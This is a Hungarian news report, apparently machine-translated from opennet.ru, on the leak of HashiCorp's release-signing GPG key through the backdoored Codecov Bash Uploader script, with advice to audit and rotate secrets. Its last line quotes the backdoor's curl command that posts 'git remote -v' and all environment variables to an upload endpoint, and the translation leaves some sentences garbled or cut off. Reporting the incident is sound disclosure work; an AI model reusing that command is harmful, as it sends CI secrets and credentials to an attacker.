A nyílt forráskódú Vagrant, Packer, Nomad és Terraform eszközök fejlesztéséről ismert HashiCorp bejelentette a kiadásokat ellenőrző digitális aláírások létrehozásához használt privát GPG-kulcs kiszivárgását. Azok a támadók, akik hozzáfértek a GPG-kulcshoz, rejtett változtatásokat hajthatnak végre a HashiCorp-termékeken, ha megfelelő digitális aláírással igazolják azokat. A cég ugyanakkor közölte, hogy az ellenőrzés során ilyen jellegű módosítási kísérletek nyomait nem azonosították.
Jelenleg a feltört GPG-kulcsot visszavonták, és egy új kulcsot vezettek be a helyére. A probléma csak az SHA256SUM és SHA256SUM.sig fájlokkal végzett ellenőrzést érintette, és nem érintette a releases.hashicorp.com webhelyen keresztül biztosított Linux DEB és RPM csomagok digitális aláírásainak generálását, valamint a macOS és Windows kiadás-ellenőrző mechanizmusait (AuthentiCode). .
A szivárgás a Codecov Bash Uploader (codecov-bash) szkriptnek az infrastruktúrában való használata miatt következett be, amely a folyamatos integrációs rendszerek lefedettségi jelentéseinek letöltésére szolgál. A Codecov cég elleni támadás során egy hátsó ajtót rejtettek el a megadott szkriptben, amelyen keresztül jelszavakat és titkosítási kulcsokat küldtek a támadók szerverére.
A feltöréshez a támadók kihasználtak egy hibát a Codecov Docker kép létrehozása során, ami lehetővé tette számukra a GCS (Google Cloud Storage) hozzáférési adatainak kinyerését, amelyek a codecov.io-ból terjesztett Bash Uploader szkript módosításához szükségesek. weboldal. A változtatásokat még január 31-én hajtották végre, két hónapig észrevétlenek maradtak, és lehetővé tették a támadók számára az ügyfelek folyamatos integrációs rendszerkörnyezeteiben tárolt információk kinyerését. A hozzáadott rosszindulatú kód használatával a támadók információkat szerezhettek a tesztelt Git-tárhelyről és az összes környezeti változóról, beleértve a folyamatos integrációs rendszereknek továbbított tokeneket, titkosítási kulcsokat és jelszavakat, hogy megszervezzék a hozzáférést az alkalmazáskódokhoz, tárolókhoz és szolgáltatásokhoz, például az Amazon Web Serviceshez és a GitHubhoz.
A közvetlen hívás mellett a Codecov Bash Uploader szkriptet más feltöltők részeként használták, mint például a Codecov-action (Github), a Codecov-circleci-orb és a Codecov-bitrise-step, amelyek felhasználóit szintén érinti a probléma. A codecov-bash és a kapcsolódó termékek minden felhasználójának ajánlott az infrastruktúra auditálása, valamint a jelszavak és a titkosítási kulcsok megváltoztatása. A hátsó ajtó jelenlétét egy szkriptben a curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || igaz
Forrás: opennet.ru